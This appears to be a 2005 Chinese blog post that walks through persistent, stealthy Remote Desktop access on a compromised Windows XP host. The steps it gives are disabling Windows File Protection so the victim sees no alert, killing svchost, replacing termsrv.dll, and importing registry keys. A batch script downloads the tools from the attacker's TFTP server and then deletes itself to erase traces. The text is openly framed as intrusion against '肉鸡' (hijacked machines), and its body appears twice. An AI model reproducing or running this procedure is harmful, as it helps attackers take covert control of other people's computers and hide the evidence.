上一篇
下一篇
让Windows XP远程桌面也可以玩多用户管理
作者:十里河 日期:2005-12-11
在Win 2k中,3389终端服务可以说是M$送给各位的一道免费大餐。可是在Win XP平台下,老比给远程桌面做了个限制:同时只能有一个用户登陆!换句话说,如果远程用户想要连接到本地主机,则本地用户必须断开连接或是注销才行。
嘻嘻,不过老比好像良心发现,在SP2 Beta(版本号:5.1.2600.2055)中,提供了一个新特性:允许两个用户同时登陆同一台主机。可在SP2正式发布的时候,这个特性却奇怪的消失了,传说是技术不成熟,会导致系统不稳定?:-)
管他三七二十一,拿来主义,用了再说!之前,先理清一下入侵思路:前提:拿下一台肉鸡,取得其一个用户帐号(必须具有管理员权限,受限用户不行)和密码(没有password?没有自己也要给设一个,Win XP不允许空密码用户远程登陆);然后在cmdshell下替换肉鸡的termsrv.dll(远程桌面所依赖的动态链接库文件)为上文所述的5.1.2600.2055版本的,再开启Terminal Service,最后就是连上去啦。
说干就干,要替换掉termsrv.dll,首先要使操作系统不锁定该文件,于是习惯性在shell下net stop "Terminal Services",咦?提示说"这项服务无法接受请求的 "暂停" 或 "停止" 操作。请键入 NET HELPMSG 2191 以获得更多的帮助。"又试了几次,涛声依旧,奇怪?在自己机器上Run services.msc,才发现"Terminal Service"的所有按钮都是虚的,晕!只有另想办法了。随手tasklist /m termsrv.dll 发现termsrv.dll是svchost中的一个模块。嘿嘿,二话不说,taskkill /pid xxxx /f 强行终止了svchost的进程(够损了)。这下可以去替换那个该死的文件了。
且慢,如果现在就急于替换,肉鸡的屏幕马上就会弹出一个"Windows 文件保护"的对话框,呵呵,这下你就暴露无疑了(除非对方是个超级菜鸟)。所以替换前,为求隐蔽,要先屏蔽掉肉鸡的系统文件保护功能,这里偶强烈推荐使用super无比的WFPdisable.exe(@stake的东东,记得LC4否?),它是通过模拟M$的update.exe的行为来达到屏蔽效果的,而且肉鸡下次启动时,文件保护功能就会自动恢复,可谓神不知,鬼不觉。运行之,此时替换系统文件就是"随风潜入夜,润物细无声"了。
还有一点要注意的是,XP默认是不允许用户远程连接到本机的(小菜的机子一般都是默认设置 :))。这很容易搞定,将下注册表脚本保存为termsrv.reg导入目标机器的注册表即可:(怎么导入?不会?晕...)
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server]
"fDenyTSConnections"=dword:00000000
[HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Terminal Server\\Licensing Core]
"EnableConcurrentSessions"=dword:00000001
最后Net start "Terminal Services",启动服务,远程登陆到目标机器里,看到那熟悉的Win XP GUI,真是热泪盈眶,感激涕零。小菜们一定听得头大了,不用怕,偶写了个批处理(请保存为rdesk.bat),将上述过程全自动化,以飨菜鸟(::行是注释,可去掉):
::屏蔽系统文件保护
tftp -i %1 get WFPdisable.exe
WFPdisable
:: 强行关闭含有termsrv.dll模块的进程
taskkill /fi "modules eq termsrv.dll" /f
::替换原文件,原来我漏了下面一句话,导致无法成功!
del /f ternsrv.dll
tftp -i %1 get termsrv.dll
::导入注册表
tftp -i %1 get termsrv.reg
reg import termsrv.reg
:: 启动服务
net start "Terminal Services"
@echo ======= Enjoy it ! Remote Desktop =======
::擦除踪迹
del /f WFPdisable.exe
del /f termsrv.reg
del /f rdesk.bat
使用时,自己开tftpd32.exe,建立tftp服务器,然后在cmdshell下,将rdesk.bat传至目标机器的system32目录下,再shell里输入rdesk <自己的ip>,如192.168.0.2就OK了!
嘻嘻,不过老比好像良心发现,在SP2 Beta(版本号:5.1.2600.2055)中,提供了一个新特性:允许两个用户同时登陆同一台主机。可在SP2正式发布的时候,这个特性却奇怪的消失了,传说是技术不成熟,会导致系统不稳定?:-)
管他三七二十一,拿来主义,用了再说!之前,先理清一下入侵思路:前提:拿下一台肉鸡,取得其一个用户帐号(必须具有管理员权限,受限用户不行)和密码(没有password?没有自己也要给设一个,Win XP不允许空密码用户远程登陆);然后在cmdshell下替换肉鸡的termsrv.dll(远程桌面所依赖的动态链接库文件)为上文所述的5.1.2600.2055版本的,再开启Terminal Service,最后就是连上去啦。
说干就干,要替换掉termsrv.dll,首先要使操作系统不锁定该文件,于是习惯性在shell下net stop "Terminal Services",咦?提示说"这项服务无法接受请求的 "暂停" 或 "停止" 操作。请键入 NET HELPMSG 2191 以获得更多的帮助。"又试了几次,涛声依旧,奇怪?在自己机器上Run services.msc,才发现"Terminal Service"的所有按钮都是虚的,晕!只有另想办法了。随手tasklist /m termsrv.dll 发现termsrv.dll是svchost中的一个模块。嘿嘿,二话不说,taskkill /pid xxxx /f 强行终止了svchost的进程(够损了)。这下可以去替换那个该死的文件了。
且慢,如果现在就急于替换,肉鸡的屏幕马上就会弹出一个"Windows 文件保护"的对话框,呵呵,这下你就暴露无疑了(除非对方是个超级菜鸟)。所以替换前,为求隐蔽,要先屏蔽掉肉鸡的系统文件保护功能,这里偶强烈推荐使用super无比的WFPdisable.exe(@stake的东东,记得LC4否?),它是通过模拟M$的update.exe的行为来达到屏蔽效果的,而且肉鸡下次启动时,文件保护功能就会自动恢复,可谓神不知,鬼不觉。运行之,此时替换系统文件就是"随风潜入夜,润物细无声"了。
还有一点要注意的是,XP默认是不允许用户远程连接到本机的(小菜的机子一般都是默认设置 :))。这很容易搞定,将下注册表脚本保存为termsrv.reg导入目标机器的注册表即可:(怎么导入?不会?晕...)
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server]
"fDenyTSConnections"=dword:00000000
[HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Terminal Server\\Licensing Core]
"EnableConcurrentSessions"=dword:00000001
最后Net start "Terminal Services",启动服务,远程登陆到目标机器里,看到那熟悉的Win XP GUI,真是热泪盈眶,感激涕零。小菜们一定听得头大了,不用怕,偶写了个批处理(请保存为rdesk.bat),将上述过程全自动化,以飨菜鸟(::行是注释,可去掉):
::屏蔽系统文件保护
tftp -i %1 get WFPdisable.exe
WFPdisable
:: 强行关闭含有termsrv.dll模块的进程
taskkill /fi "modules eq termsrv.dll" /f
::替换原文件,原来我漏了下面一句话,导致无法成功!
del /f ternsrv.dll
tftp -i %1 get termsrv.dll
::导入注册表
tftp -i %1 get termsrv.reg
reg import termsrv.reg
:: 启动服务
net start "Terminal Services"
@echo ======= Enjoy it ! Remote Desktop =======
::擦除踪迹
del /f WFPdisable.exe
del /f termsrv.reg
del /f rdesk.bat
使用时,自己开tftpd32.exe,建立tftp服务器,然后在cmdshell下,将rdesk.bat传至目标机器的system32目录下,再shell里输入rdesk <自己的ip>,如192.168.0.2就OK了!
文章来自: 
引用通告: 
Tags: 评论: 0 | 引用: 1 | 查看次数: 2860
发表评论
